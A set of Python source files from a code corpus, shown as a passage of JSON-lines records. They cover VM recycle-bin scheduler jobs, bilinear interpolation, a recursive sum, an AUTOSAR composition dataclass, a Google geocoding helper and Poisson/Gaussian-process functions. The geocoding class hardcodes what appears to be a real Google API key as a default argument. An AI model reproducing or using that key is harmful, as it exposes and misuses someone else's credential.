RecycleBin.objects.all()\n for line in delete_vm_list:\n delete_date = line.delete_date\n now = datetime.datetime.now()\n date = delete_date - now\n if date.days > 0:\n # time until deletion, still measured in days\n message_day = [1, 2, 3, 7]\n if date.days in message_day:\n # check whether a message was already sent today\n send_alert_message(line, date.days, is_day=1)\n elif date.days == 0:\n # send mail once more during the last seven hours\n hours = int(date.seconds / 3600)\n if hours in [7, 3, 5, 4, 2]:\n send_alert_message(line, hours, is_day=0)\n else:\n # the grace period has passed, perform the deletion\n try:\n status = line.virtual.status\n if status != 9:\n continue\n # delete the physical files\n host_handler = HostHandler(line.virtual.host_ip)\n host_handler.remove_delete_vm(line.virtual.name)\n # delete the recycle-bin record\n line.delete()\n # delete the row from the Virtual table\n Virtual.objects.filter(id=line.virtual_id).delete()\n except Exception as ex:\n message = '虚拟机 %s 删除失败 失败原因: \n' % line.virtual.name + str(ex)\n send_report_message(message)\n logger.info('job check_delete_virtual end')\n\n\ndef update_idc_from_cmdb():\n \"\"\"\n * desc update IDC (data center) info from the CMDB\n * input None\n * output None\n \"\"\"\n logger.info('job update_idc_from_cmdb start')\n update_idc()\n logger.info('job update_idc_from_cmdb end')\n\n\ndef update_hosts_from_cmdb():\n \"\"\"\n * desc update host info from the CMDB\n * input None\n * output None\n \"\"\"\n logger.info('job update_hosts_from_cmdb start')\n update_host_from_cmdb()\n logger.info('job update_hosts_from_cmdb end')\n\n\ndef check_down_process():\n \"\"\"\n * desc check images being downloaded and update their progress\n * input None\n * output None\n \"\"\"\n logger.info('job check_down_process start')\n down_process()\n 
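# down_process (imported from .images) refreshes the progress of in-flight downloads\n 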
logger.info('job check_down_process end')\n\n\ndef check_start_down():\n \"\"\"\n * desc check whether any image files need to be downloaded\n * input None\n * output None\n \"\"\"\n logger.info('job check_start_down start')\n image_db = Images.objects.filter(status=2)\n for line in image_db:\n start_down(line.id)\n logger.info('job check_start_down end')\n\n\ndef check_md5_check():\n \"\"\"\n * desc MD5 checksum verification\n * input None\n * output None\n \"\"\"\n logger.info('job check_md5_check start')\n md5_check()\n logger.info('job check_md5_check end')\n","sub_path":"python/vir_manager/job/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":9194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"557856668","text":"class interpolation:\n\n def linear_interpolation(self, pt1, pt2, unknown):\n \"\"\"Computes the linear interpolation for the unknown values using pt1 and pt2\n take as input\n pt1: known point pt1 and f(pt1) or intensity value\n pt2: known point pt2 and f(pt2) or intensity value\n unknown: take an unknown location\n return the f(unknown) or intensity at unknown\"\"\"\n\n #Write your code for linear interpolation here\n pt1,intensity1=pt1\n pt2,intensity2=pt2\n newPoint=unknown\n intensity_diff=pt2-pt1\n if(intensity_diff<=0):\n intensity_diff=1 # guard against a zero denominator\n\n a1=pt2-newPoint\n b1=a1/intensity_diff\n x=intensity1*b1\n a2=newPoint - pt1\n b2=a2/intensity_diff\n y=intensity2*b2\n new_intensity=x+y\n\n return new_intensity\n\n def bilinear_interpolation(self, pt1, pt2, pt3, pt4, unknown):\n \"\"\"Computes the bilinear interpolation for the unknown values using pt1 to pt4\n take as input\n pt1: known point pt1 and f(pt1) or intensity value\n pt2: known point pt2 and f(pt2) or intensity value\n pt3: known point pt3 and f(pt3) or intensity value\n pt4: known point pt4 and f(pt4) or intensity value\n unknown: take an unknown location\n return the f(unknown) or intensity at unknown\"\"\"\n\n # Write your code for bilinear interpolation here\n # Maybe you can reuse or call the linear interpolation method to compute this task\n \n X1,Y1, intensity1 = pt1\n X2,Y2, intensity2 = pt2\n X3,Y3, intensity3 = pt3\n X4,Y4, intensity4 = pt4\n newPointX1,newPointY1 = unknown\n\n newpt1=self.linear_interpolation((X1,intensity1),(X2,intensity2),newPointX1)\n newpt2=self.linear_interpolation((X3,intensity3),(X4,intensity4),newPointX1)\n newpt1=Y1,newpt1\n newpt2=Y4,newpt2\n intensity=self.linear_interpolation(newpt1,newpt2,newPointY1)\n \n \n\n return intensity\n","sub_path":"resize/interpolation.py","file_name":"interpolation.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"227485651","text":"def sum(arr):\n \"\"\"Compute the total of the list using recursion\n\n Args:\n arr (list): the numbers to add up\n\n Returns:\n the sum of the elements of arr\n \"\"\"\n if len(arr) < 1:\n return 0\n else:\n return arr[0] + sum(arr[1:])\n\n\nprint(sum([1, 2, 3, 4, 5 ]))\n","sub_path":"algorithm/chap_04/Sum2.py","file_name":"Sum2.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"549527611","text":"from dataclasses import dataclass, field\nfrom typing import List, Optional\nfrom .annotation import (\n AdminData,\n Annotation,\n DocumentationBlock,\n VariationPoint,\n)\nfrom .assembly_sw_connector import AssemblySwConnector\nfrom .blueprint_policy_list import BlueprintPolicyList\nfrom .blueprint_policy_not_modifiable import 
BlueprintPolicyNotModifiable\nfrom .blueprint_policy_single import BlueprintPolicySingle\nfrom .category_string import CategoryString\nfrom .consistency_needs import ConsistencyNeeds\nfrom .constant_specification_mapping_set_subtypes_enum import ConstantSpecificationMappingSetSubtypesEnum\nfrom .data_type_mapping_set_subtypes_enum import DataTypeMappingSetSubtypesEnum\nfrom .delegation_sw_connector import DelegationSwConnector\nfrom .identifier import Identifier\nfrom .instantiation_timing_event_props import InstantiationTimingEventProps\nfrom .multi_language_overview_paragraph import MultiLanguageOverviewParagraph\nfrom .multilanguage_long_name import MultilanguageLongName\nfrom .p_port_prototype import PPortPrototype\nfrom .pass_through_sw_connector import PassThroughSwConnector\nfrom .port_group import PortGroup\nfrom .pr_port_prototype import PrPortPrototype\nfrom .r_port_prototype import RPortPrototype\nfrom .ref import Ref\nfrom .short_name_fragment import ShortNameFragment\nfrom .string import String\nfrom .sw_component_documentation import SwComponentDocumentation\nfrom .sw_component_prototype import SwComponentPrototype\nfrom .unit_group_subtypes_enum import UnitGroupSubtypesEnum\n\n__NAMESPACE__ = \"http://autosar.org/schema/r4.0\"\n\n\n@dataclass\nclass CompositionSwComponentType:\n \"\"\"A CompositionSwComponentType aggregates SwComponentPrototypes (that in turn\n are typed by SwComponentTypes) as well as SwConnectors for primarily connecting\n SwComponentPrototypes among each others and towards the surface of the\n CompositionSwComponentType.\n\n By this means hierarchical structures of software-components can be\n created.\n\n :ivar short_name: This specifies an identifying shortName for the\n object. It needs to be unique within its context and is intended\n for humans but even more for technical reference.\n :ivar short_name_fragments: This specifies how the\n Referrable.shortName is composed of several shortNameFragments.\n :ivar long_name: This specifies the long name of the object. Long\n name is targeted to human readers and acts like a headline.\n :ivar desc: This represents a general but brief (one paragraph)\n description what the object in question is about. It is only one\n paragraph! Desc is intended to be collected into overview\n tables. This property helps a human reader to identify the\n object in question. More elaborate documentation, (in particular\n how the object is built or used) should go to \"introduction\".\n :ivar category: The category is a keyword that specializes the\n semantics of the Identifiable. It affects the expected existence\n of attributes and the applicability of constraints.\n :ivar admin_data: This represents the administrative data for the\n identifiable object.\n :ivar introduction: This represents more information about how the\n object in question is built or is used. Therefore it is a\n DocumentationBlock.\n :ivar annotations: Possibility to provide additional notes while\n defining a model element (e.g. the ECU Configuration Parameter\n Values). These are not intended as documentation but are mere\n design notes.\n :ivar variation_point: This element was generated/modified due to an\n atpVariation stereotype.\n :ivar blueprint_policys: This role indicates whether the\n blueprintable element will be modifiable or not motifiable.\n :ivar short_name_pattern: This attribute represents the pattern\n which shall be used to build the shortName of the derived\n elements. As of now it is modeled as a String. 
In general it\n should follow the pattern: pattern = (placeholder | namePart)*\n placeholder = \"{\" namePart \"}\" namePart = identifier | \"_\" This\n is subject to be refined in subsequent versions. Note that this\n is marked as obsolete. Use the xml attribute namePattern instead\n as it applies to Identifier and CIdentifier (shortName, symbol\n etc.)\n :ivar sw_component_documentations: This adds a documentation to the\n SwComponentType. The upper multiplicity of this role has been\n increased to * due to resolving an atpVariation stereotype. The\n previous value was 1.\n :ivar consistency_needss: This represents the collection of\n ConsistencyNeeds owned by the enclosing SwComponentType. The\n upper multiplicity of this role has been increased to * due to\n resolving an atpVariation stereotype. The previous value was -1.\n :ivar ports: The PortPrototypes through which this SwComponentType\n can communicate. The aggregation of PortPrototype is subject to\n variability with the purpose to support the conditional\n existence of PortPrototypes. The upper multiplicity of this role\n has been increased to * due to resolving an atpVariation\n stereotype. The previous value was -1.\n :ivar port_groups: A port group being part of this component. The\n upper multiplicity of this role has been increased to * due to\n resolving an atpVariation stereotype. The previous value was -1.\n :ivar unit_group_refs: This allows for the specification of which\n UnitGroups are relevant in the context of referencing\n SwComponentType.\n :ivar components: @RESTRICT_TO_STANDARD:CP! The instantiated\n components that are part of this composition. The aggregation of\n SwComponentPrototype is subject to variability with the purpose\n to support the conditional existence of a SwComponentPrototype.\n Please be aware: if the conditional existence of\n SwComponentPrototypes is resolved post-build the deselected\n SwComponentPrototypes are still contained in the ECUs build but\n the instances are inactive in in that they are not scheduled by\n the RTE. The aggregation is marked as atpSplitable in order to\n allow the addition of service components to the ECU extract\n during the ECU integration. The use case for having 0 components\n owned by the CompositionSwComponentType could be to deliver an\n empty CompositionSwComponentType to e.g. a supplier for filling\n the internal structure. @END_RESTRICT_TO_STANDARD!\n @RESTRICT_TO_STANDARD:AP! The instantiated components that are\n part of this composition. @END_RESTRICT_TO_STANDARD! The upper\n multiplicity of this role has been increased to * due to\n resolving an atpVariation stereotype. The previous value was -1.\n :ivar connectors: SwConnectors have the principal ability to\n establish a connection among PortPrototypes. They can have many\n roles in the context of a CompositionSwComponentType. Details\n are refined by subclasses. The aggregation of SwConnectors is\n subject to variability with the purpose to support variant data\n flow. @RESTRICT_TO_STANDARD:CP:AP! The aggregation is marked as\n atpSplitable in order to allow the extension of the ECU extract\n with AssemblySwConnectors between ApplicationSwComponentTypes\n and ServiceSwComponentTypes during the ECU integration.\n @END_RESTRICT_TO_STANDARD! The upper multiplicity of this role\n has been increased to * due to resolving an atpVariation\n stereotype. 
The previous value was -1.\n :ivar constant_value_mapping_refs: Reference to the\n ConstantSpecificationMapping to be applied for initValues of\n PPortComSpecs and RPortComSpec.\n :ivar data_type_mapping_refs: @RESTRICT_TO_STANDARD:CP! Reference to\n the DataTypeMapping to be applied for the used\n ApplicationDataTypes in PortInterfaces. Background: when\n developing subsystems it may happen that ApplicationDataTypes\n are used on the surface of CompositionSwComponentTypes. In this\n case it would be reasonable to be able to also provide the\n intended mapping to the ImplementationDataTypes. However, this\n mapping shall be informal and not technically binding for the\n implementors mainly because the RTE generator is not concerned\n about the CompositionSwComponentTypes. Rationale: if the mapping\n of ApplicationDataTypes on the delegated and inner PortPrototype\n matches then the mapping to ImplementationDataTypes is not\n impacting compatibility. @END_RESTRICT_TO_STANDARD!\n @RESTRICT_TO_STANDARD:AP! Reference to the DataTypeMapping to be\n applied for the used ApplicationDataTypes in ServiceInterfaces.\n @END_RESTRICT_TO_STANDARD!\n :ivar instantiation_rte_event_propss: This allows to define\n instantiation specific properties for RTE Events, in particular\n for instance specific scheduling. The upper multiplicity of this\n role has been increased to * due to resolving an atpVariation\n stereotype. The previous value was -1.\n :ivar s: Checksum calculated by the user's tool environment for an\n ArObject. May be used in an own tool environment to determine if\n an ArObject has changed. The checksum has no semantic meaning\n for an AUTOSAR model and there is no requirement for AUTOSAR\n tools to manage the checksum.\n :ivar t: Timestamp calculated by the user's tool environment for an\n ArObject. May be used in an own tool environment to determine\n the last change of an ArObject. The timestamp has no semantic\n meaning for an AUTOSAR model and there is no requirement for\n AUTOSAR tools to manage the timestamp.\n :ivar uuid: The purpose of this attribute is to provide a globally\n unique identifier for an instance of a meta-class. The values of\n this attribute should be globally unique strings prefixed by the\n type of identifier. For example, to include a DCE UUID as\n defined by The Open Group, the UUID would be preceded by \"DCE:\".\n The values of this attribute may be used to support merging of\n different AUTOSAR models. The form of the UUID (Universally\n Unique Identifier) is taken from a standard defined by the Open\n Group (was Open Software Foundation). This standard is widely\n used, including by Microsoft for COM (GUIDs) and by many\n companies for DCE, which is based on CORBA. The method for\n generating these 128-bit IDs is published in the standard and\n the effectiveness and uniqueness of the IDs is not in practice\n disputed. If the id namespace is omitted, DCE is assumed. An\n example is \"DCE:2fac1234-31f8-11b4-a222-08002b34c003\". 
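A fresh UUID value can be generated in\n        Python with the standard-library call uuid.uuid4(). 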
The uuid\n attribute has no semantic meaning for an AUTOSAR model and there\n is no requirement for AUTOSAR tools to manage the timestamp.\n \"\"\"\n class Meta:\n name = \"COMPOSITION-SW-COMPONENT-TYPE\"\n\n short_name: Optional[Identifier] = field(\n default=None,\n metadata={\n \"name\": \"SHORT-NAME\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n \"required\": True,\n }\n )\n short_name_fragments: Optional[\"CompositionSwComponentType.ShortNameFragments\"] = field(\n default=None,\n metadata={\n \"name\": \"SHORT-NAME-FRAGMENTS\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n long_name: Optional[MultilanguageLongName] = field(\n default=None,\n metadata={\n \"name\": \"LONG-NAME\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n desc: Optional[MultiLanguageOverviewParagraph] = field(\n default=None,\n metadata={\n \"name\": \"DESC\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n category: Optional[CategoryString] = field(\n default=None,\n metadata={\n \"name\": \"CATEGORY\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n admin_data: Optional[AdminData] = field(\n default=None,\n metadata={\n \"name\": \"ADMIN-DATA\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n introduction: Optional[DocumentationBlock] = field(\n default=None,\n metadata={\n \"name\": \"INTRODUCTION\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n annotations: Optional[\"CompositionSwComponentType.Annotations\"] = field(\n default=None,\n metadata={\n \"name\": \"ANNOTATIONS\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n variation_point: Optional[VariationPoint] = field(\n default=None,\n metadata={\n \"name\": \"VARIATION-POINT\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n blueprint_policys: Optional[\"CompositionSwComponentType.BlueprintPolicys\"] = field(\n default=None,\n metadata={\n \"name\": \"BLUEPRINT-POLICYS\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n short_name_pattern: Optional[String] = field(\n default=None,\n metadata={\n \"name\": \"SHORT-NAME-PATTERN\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n sw_component_documentations: Optional[\"CompositionSwComponentType.SwComponentDocumentations\"] = field(\n default=None,\n metadata={\n \"name\": \"SW-COMPONENT-DOCUMENTATIONS\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n consistency_needss: Optional[\"CompositionSwComponentType.ConsistencyNeedss\"] = field(\n default=None,\n metadata={\n \"name\": \"CONSISTENCY-NEEDSS\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n ports: Optional[\"CompositionSwComponentType.Ports\"] = field(\n default=None,\n metadata={\n \"name\": \"PORTS\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n port_groups: Optional[\"CompositionSwComponentType.PortGroups\"] = field(\n default=None,\n metadata={\n \"name\": \"PORT-GROUPS\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n unit_group_refs: Optional[\"CompositionSwComponentType.UnitGroupRefs\"] = field(\n default=None,\n metadata={\n \"name\": 
\"UNIT-GROUP-REFS\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n components: Optional[\"CompositionSwComponentType.Components\"] = field(\n default=None,\n metadata={\n \"name\": \"COMPONENTS\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n connectors: Optional[\"CompositionSwComponentType.Connectors\"] = field(\n default=None,\n metadata={\n \"name\": \"CONNECTORS\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n constant_value_mapping_refs: Optional[\"CompositionSwComponentType.ConstantValueMappingRefs\"] = field(\n default=None,\n metadata={\n \"name\": \"CONSTANT-VALUE-MAPPING-REFS\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n data_type_mapping_refs: Optional[\"CompositionSwComponentType.DataTypeMappingRefs\"] = field(\n default=None,\n metadata={\n \"name\": \"DATA-TYPE-MAPPING-REFS\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n instantiation_rte_event_propss: Optional[\"CompositionSwComponentType.InstantiationRteEventPropss\"] = field(\n default=None,\n metadata={\n \"name\": \"INSTANTIATION-RTE-EVENT-PROPSS\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n s: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"S\",\n \"type\": \"Attribute\",\n }\n )\n t: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"T\",\n \"type\": \"Attribute\",\n \"pattern\": r\"([0-9]{4}-[0-9]{2}-[0-9]{2})(T[0-9]{2}:[0-9]{2}:[0-9]{2}(Z|([+\\-][0-9]{2}:[0-9]{2})))?\",\n }\n )\n uuid: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"UUID\",\n \"type\": \"Attribute\",\n }\n )\n\n @dataclass\n class ShortNameFragments:\n short_name_fragment: List[ShortNameFragment] = field(\n default_factory=list,\n metadata={\n \"name\": \"SHORT-NAME-FRAGMENT\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n\n @dataclass\n class Annotations:\n annotation: List[Annotation] = field(\n default_factory=list,\n metadata={\n \"name\": \"ANNOTATION\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n\n @dataclass\n class BlueprintPolicys:\n blueprint_policy_list: List[BlueprintPolicyList] = field(\n default_factory=list,\n metadata={\n \"name\": \"BLUEPRINT-POLICY-LIST\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n blueprint_policy_not_modifiable: List[BlueprintPolicyNotModifiable] = field(\n default_factory=list,\n metadata={\n \"name\": \"BLUEPRINT-POLICY-NOT-MODIFIABLE\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n blueprint_policy_single: List[BlueprintPolicySingle] = field(\n default_factory=list,\n metadata={\n \"name\": \"BLUEPRINT-POLICY-SINGLE\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n\n @dataclass\n class SwComponentDocumentations:\n sw_component_documentation: List[SwComponentDocumentation] = field(\n default_factory=list,\n metadata={\n \"name\": \"SW-COMPONENT-DOCUMENTATION\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n\n @dataclass\n class ConsistencyNeedss:\n consistency_needs: List[ConsistencyNeeds] = field(\n default_factory=list,\n metadata={\n \"name\": \"CONSISTENCY-NEEDS\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n\n 
@dataclass\n class Ports:\n p_port_prototype: List[PPortPrototype] = field(\n default_factory=list,\n metadata={\n \"name\": \"P-PORT-PROTOTYPE\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n pr_port_prototype: List[PrPortPrototype] = field(\n default_factory=list,\n metadata={\n \"name\": \"PR-PORT-PROTOTYPE\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n r_port_prototype: List[RPortPrototype] = field(\n default_factory=list,\n metadata={\n \"name\": \"R-PORT-PROTOTYPE\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n\n @dataclass\n class PortGroups:\n port_group: List[PortGroup] = field(\n default_factory=list,\n metadata={\n \"name\": \"PORT-GROUP\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n\n @dataclass\n class UnitGroupRefs:\n unit_group_ref: List[\"CompositionSwComponentType.UnitGroupRefs.UnitGroupRef\"] = field(\n default_factory=list,\n metadata={\n \"name\": \"UNIT-GROUP-REF\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n\n @dataclass\n class UnitGroupRef(Ref):\n dest: Optional[UnitGroupSubtypesEnum] = field(\n default=None,\n metadata={\n \"name\": \"DEST\",\n \"type\": \"Attribute\",\n \"required\": True,\n }\n )\n\n @dataclass\n class Components:\n sw_component_prototype: List[SwComponentPrototype] = field(\n default_factory=list,\n metadata={\n \"name\": \"SW-COMPONENT-PROTOTYPE\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n\n @dataclass\n class Connectors:\n assembly_sw_connector: List[AssemblySwConnector] = field(\n default_factory=list,\n metadata={\n \"name\": \"ASSEMBLY-SW-CONNECTOR\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n delegation_sw_connector: List[DelegationSwConnector] = field(\n default_factory=list,\n metadata={\n \"name\": \"DELEGATION-SW-CONNECTOR\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n pass_through_sw_connector: List[PassThroughSwConnector] = field(\n default_factory=list,\n metadata={\n \"name\": \"PASS-THROUGH-SW-CONNECTOR\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n\n @dataclass\n class ConstantValueMappingRefs:\n constant_value_mapping_ref: List[\"CompositionSwComponentType.ConstantValueMappingRefs.ConstantValueMappingRef\"] = field(\n default_factory=list,\n metadata={\n \"name\": \"CONSTANT-VALUE-MAPPING-REF\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n\n @dataclass\n class ConstantValueMappingRef(Ref):\n dest: Optional[ConstantSpecificationMappingSetSubtypesEnum] = field(\n default=None,\n metadata={\n \"name\": \"DEST\",\n \"type\": \"Attribute\",\n \"required\": True,\n }\n )\n\n @dataclass\n class DataTypeMappingRefs:\n data_type_mapping_ref: List[\"CompositionSwComponentType.DataTypeMappingRefs.DataTypeMappingRef\"] = field(\n default_factory=list,\n metadata={\n \"name\": \"DATA-TYPE-MAPPING-REF\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n\n @dataclass\n class DataTypeMappingRef(Ref):\n dest: Optional[DataTypeMappingSetSubtypesEnum] = field(\n default=None,\n metadata={\n \"name\": \"DEST\",\n \"type\": \"Attribute\",\n \"required\": True,\n }\n )\n\n @dataclass\n class InstantiationRteEventPropss:\n instantiation_timing_event_props: 
List[InstantiationTimingEventProps] = field(\n default_factory=list,\n metadata={\n \"name\": \"INSTANTIATION-TIMING-EVENT-PROPS\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n","sub_path":"autosar/models/composition_sw_component_type.py","file_name":"composition_sw_component_type.py","file_ext":"py","file_size_in_byte":24494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"263406461","text":"import json\nimport requests\nimport re\n\nclass Geocode_Location:\n\n def __init__(self, google_api_key = \"AIzaSyD9uzu87hhGsu6Wh7C2-7F8tO2WIWWA5bY\") :\n self.google_api_key = google_api_key\n self.location_keywords = []\n self.ids = []\n self.locations = []\n \n def get_location_keywords(self) :\n return self.location_keywords\n\n def get_locations(self) :\n return self.locations\n \n def load_locations_countires(self, locations, countries) :\n for location in locations :\n self.send_request(location)\n \n for location in countries :\n self.send_request(location)\n\n def send_request(self, location) :\n location = location.lower()\n if location in self.location_keywords :\n return\n ignore_pure_number = re.search(\"^[^a-zA-Z]+$\", location)\n if ignore_pure_number == None :\n self.location_keywords.append(location)\n else :\n return\n location = location.replace(\" \",\"+\")\n url = 'https://maps.googleapis.com/maps/api/geocode/json?address=' + location + '&key=' + self.google_api_key\n response = requests.get(url)\n if response.status_code == 200 :\n result = json.loads(response.text)\n if result[\"status\"] != \"OK\" :\n return\n for obj in result[\"results\"][0][\"address_components\"] :\n temp = obj[\"long_name\"].lower()\n ignore_pure_number = re.search(\"^[^a-zA-Z]+$\",temp)\n if ignore_pure_number != None :\n continue\n if temp not in self.location_keywords :\n self.location_keywords.append(temp)\n temp = obj[\"short_name\"].lower()\n ignore_pure_number = re.search(\"^[^a-zA-Z]+$\",temp)\n if ignore_pure_number != None :\n continue\n if temp not in self.location_keywords :\n self.location_keywords.append(temp)\n dic = {}\n dic[\"google_id\"] = result[\"results\"][0][\"place_id\"]\n if dic[\"google_id\"] in self.ids:\n return\n dic[\"address\"] = result[\"results\"][0][\"formatted_address\"]\n self.ids.append(dic[\"google_id\"])\n self.locations.append(dic)","sub_path":"Backend/NLP_PhaseMatcher_version/Geocode_Location.py","file_name":"Geocode_Location.py","file_ext":"py","file_size_in_byte":2298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"466083943","text":"import pandas as pd\nimport math\nimport matplotlib\nimport numpy as np\nimport functions as fn\nimport time\nimport scipy.special as scispec\nimport scipy.optimize as scopt\n\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\n\ndef poisson_cont(k, landa): # to allow for non-integer k values\n numerator_p = np.power(landa, k) * np.exp(-1 * landa)\n denominator_p = scispec.gamma(k + 1) # Generalised factorial function for non-integer k values\n # if argument into gamma function is 0, the output is a zero as well, but 0! 
= 1\n p = numerator_p / denominator_p\n return p\n\n\ndef poisson_product(k_array, landa_array):\n \"\"\"Takes in 2 arrays of equal size, and takes product of poisson distributions\"\"\"\n quadrats = len(k_array) # define the number of quadrats in total\n prob_array = np.zeros(quadrats)\n\n if landa_array.size == 1:\n for i in range(len(k_array)):\n prob_array[i] = poisson_cont(k_array[i], landa_array)\n else:\n if len(k_array) == len(landa_array):\n for i in range(len(prob_array)):\n prob_array[i] = poisson_cont(k_array[i], landa_array[i])\n else:\n print('Length Mismatch')\n p_likelihood = np.prod(prob_array) # Taking combined product of distributions - leading to small values\n # Note output is a scalar (singular value)\n return p_likelihood # Returns the non logarithmic version.\n\n\ndef log_special(array):\n \"\"\"Taking an element-wise natural log of the array, retain array dimensions\"\"\"\n \"\"\"with the condition that log(0) = 0, so there are no -inf elements\"\"\"\n log_array = np.zeros(array.size)\n for i in range(array.size):\n if array[i] == 0:\n log_array[i] = 0\n else:\n log_array[i] = np.log(array[i])\n return log_array\n\n\ndef mean_func_zero(c): # Prior mean function taken as 0 for the entire sampling range\n if np.array([c.shape]).size == 1:\n mean_c = np.ones(1) * 0 # Make sure this is an array\n else:\n mean_c = np.ones(c.shape[1]) * 0\n return mean_c # Outputs a x and y coordinates, created from the mesh grid\n\n\ndef mean_func_scalar(mean, c): # Assume that the prior mean is a constant to be optimised\n if np.array([c.shape]).size == 1:\n mean_c = np.ones(1) * mean\n else:\n mean_c = np.ones(c.shape[1]) * mean\n return mean_c\n\n\ndef squared_exp_2d(sigma_exp, length_exp, x1, x2): # Only for 2-D\n \"\"\"\n Generates a covariance matrix using chosen hyper-parameters and coordinates to iterate over\n :param sigma_exp: coefficient factor\n :param length_exp: length scale\n :param x1: First set of coordinates to iterate over\n :param x2: Second set of coordinates to iterate over\n :return: Covariance Matrix with squared-exp kernel\n \"\"\"\n # To allow the function to take in x1 and x2 of various dimensions\n if np.array([x1.shape]).size == 1 and np.array([x2.shape]).size != 1 and x1.size == x2.shape[0]:\n rows = 1\n columns = x2.shape[1]\n elif np.array([x2.shape]).size == 1 and np.array([x1.shape]).size != 1 and x2.size == x1.shape[0]:\n rows = x1.shape[1]\n columns = 1\n elif np.array([x1.shape]).size == 1 and np.array([x2.shape]).size == 1 and x1.size == x2.size:\n rows = 1\n columns = 1\n else:\n rows = x1.shape[1]\n columns = x2.shape[1]\n\n c = np.zeros((rows, columns))\n\n for i in range(c.shape[0]):\n for j in range(c.shape[1]):\n if np.array([x1.shape]).size == 1 and np.array([x2.shape]).size != 1:\n diff = x1 - x2[:, j]\n elif np.array([x1.shape]).size != 1 and np.array([x2.shape]).size == 1:\n diff = x1[:, i] - x2\n elif np.array([x1.shape]).size == 1 and np.array([x2.shape]).size == 1:\n diff = x1 - x2\n else:\n diff = x1[:, i] - x2[:, j]\n\n euclidean = np.sqrt(np.matmul(diff, np.transpose(diff)))\n exp_power = np.exp(-1 * (euclidean ** 2) * (length_exp ** -2))\n c[i, j] = (sigma_exp ** 2) * exp_power\n\n return c # Note that this creates the covariance matrix directly\n\n\ndef matern_2d(v_value, sigma_matern, length_matern, x1, x2): # there are only two variables in the matern function\n \"\"\"\n Creating the covariance matrix from chosen hyper-parameters and the coordinates the iterate over\n :param v_value: the matern factor miu: 1/2 or 3/2\n :param 
